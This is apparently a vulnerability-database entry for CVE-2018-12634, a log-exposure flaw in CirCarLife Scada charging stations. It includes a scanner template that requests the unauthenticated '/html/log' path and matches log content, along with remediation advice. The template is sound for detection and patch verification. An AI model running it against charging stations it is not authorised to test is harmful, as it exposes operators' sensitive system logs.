CVE-2018-12634: CirCarLife Scada <4.3 - System Log Exposure

2025-08-01 CirCarLife Scada PoC Public

Description

CirCarLife Scada before 4.3 allows remote attackers to obtain sensitive information via a direct request for the html/log or services/system/info.html URI. CirCarLife is an internet-connected electric vehicle charging station.

PoC

id: CVE-2018-12634

info:
  name: CirCarLife Scada <4.3 - System Log Exposure
  author: geeknik
  severity: critical
  description: CirCarLife Scada before 4.3 allows remote attackers to obtain sensitive information via a direct request for the html/log or services/system/info.html URI. CirCarLife is an internet-connected electric vehicle charging station.
  impact: |
    An attacker can gain access to sensitive system logs, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Upgrade CirCarLife Scada to version 4.3 or above to fix the system log exposure vulnerability.
  reference:
    - https://circontrol.com/
    - https://nvd.nist.gov/vuln/detail/CVE-2018-12634
    - https://www.seebug.org/vuldb/ssvid-97353
    - https://www.exploit-db.com/exploits/45384/
    - https://github.com/SadFud/Exploits/tree/master/Real%20World/Suites/cir-pwn-life
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-12634
    cwe-id: CWE-200
    epss-score: 0.56401
    epss-percentile: 0.99004
    cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: circontrol
    product: circarlife_scada
  tags: cve,cve2018,scada,circontrol,circarlife,logs,edb,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/html/log"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "CirCarLife Scada"

      - type: word
        words:
          - "user.debug"
          - "user.info"
          - "EVSE"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450220353bde85a418605a9c202bf14d1d3304ebdd6b8268ac7c1659f53fedc8bbe8b2022100dda320d53f21c3735512a17998e273142e1293d6e17de6a9fce0a3c4c051037b:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities